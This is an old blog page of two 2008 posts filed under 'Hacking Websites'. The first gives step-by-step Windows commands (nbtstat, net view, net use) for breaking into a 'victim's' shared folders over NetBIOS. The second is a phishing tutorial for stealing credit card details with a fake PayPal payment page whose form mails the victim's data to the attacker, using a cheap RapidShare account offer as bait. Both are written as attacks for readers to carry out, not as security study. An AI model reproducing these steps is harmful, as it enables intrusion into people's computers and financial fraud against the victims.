Posts filed under 'Hacking Websites'
Hacking In 15 Seconds !!!
Hacking In 15 Seconds!
If your victim possess certain security flaws then her system can be broken into in less that 15 seconds.
This is how : -
Click “Start -> Run -> cmd”
Type the following at the Dos Prompt
Code:
Nbtstat -A <IP address>
[e.g: nbtstat -A 207.175.1.1]
This will give you a read out that looks like this
Code:
NetBIOS Remote Machine Name Table
____________________________________
Name Type Status
————————————
abhi <00> UNIQUE Registered
WORK <00> GROUP Registered
abhi <03> UNIQUE Registered
abhi <20> UNIQUE Registered
WORK <1E> GROUP Registered
WORK <1D> UNIQUE Registered
__MSBROWSE__.<01>GROUP Registered
____________________________________
The numbers in the <> are hex code values. What we are
interested in is the “Hex Code- number of <20>.
A hex code of <20> means you have file and printer sharing turned on.
Next step is to find out what is being shared. This is how : -
Code:
Net view \\<insert ip_address here>
[e.g : net view \\207.175.1.1]
You will then get a response that looks something like this.
Code:
Shared resources at \\ip_address
Sharename Type Comment
______________________
MY DOCUMENTS Disk
TEMP Disk
______________________
(The command was completed successfully.)
Code:
Net use x: \\<insert IP address here>\temp
[e.g : net use x: \\207.175.1.1\temp]
If all goes well for you, you will then get a response of
Code:
(The command was completed successfully.)
Open my computer you will see your victim’s temp folder there
Add comment July 8, 2008
<!– google_ad_section_start –><br />Hacking Credit Cards, Full Tutorial
Lets see Here is a tutorial how to Hack CC ……….. You Can Say it Phising I call it Mind’s work so Lets Start ………
Open Your PayPal account >>.
Go to Mechant Tools there is a section to Create Buttons for your
Website as Donate button shoping Cart ……….. when u click on more
options you will Find Setting up a Buy Now Button………..
Wat are you waiting Get the Html Code For Buy Button it will look like
CODE
http://rapidshare.com/files/77915498/Buy_Code.txt.html
We will edit this Part Later :
Now its time to make Phisher to Grab CC
save the below Text page as html Page, after editing the reqd Parts and then upload it to free hosting server …….
CODE
http://rapidshare.com/files/77918901/Pay.txt.html
You just have to edit INFO in this Line
CODE
<form action=http://www.big-llc.com/formmailer/submit
Find This Line and edit
After editing save it as Pay.html and Upload it to any free html host
Now your Uploading Link suppose its
CODE
http://name.domain.com/Pay.html
Now Go Back To above Buy Code which u get from Paypal and Replace this
Link from Paypal’s
CODE
https://www.paypal.com/cgi-bin/webscr
Now apply that code anywhere in Html when Victim Clicks on Buy Now he
will get directed towards your fake page when he puts his info and
clicks agree and continue . His Details will be Mailed to u on the id u
Provided ………
One main thing y Victim input his info …….
Go man and provide them a Years RS account for just 10$ he will die to buy that and u enjoy his details lols
Its easy isnt ?<!– google_ad_section_end –>
Add comment July 8, 2008